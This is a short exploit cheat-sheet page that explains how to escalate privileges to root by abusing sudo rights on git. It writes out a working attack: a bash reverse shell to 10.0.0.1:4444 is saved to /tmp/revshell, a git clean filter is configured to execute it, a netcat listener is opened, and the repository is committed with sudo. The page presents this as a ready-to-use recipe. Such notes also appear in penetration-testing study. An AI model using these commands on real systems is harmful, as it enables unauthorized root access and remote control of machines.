Exploit Notes

Sudo Git Privilege Escalation

Last modified: 2023-03-12

Privilege Escalation

Sudo git is vulnerable to privilege escalation.

Investigation

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

If we can commit the git repository as root, we may be able to escalate privileges.


Exploitation

1. Create a Payload

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell

2. Set Git Config

# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell

3. Commit the Repository

Before committing, we need to start a listener in local machine.

nc -lvnp 4444

Then commit with sudo.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

Now we should get a shell in local terminal.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.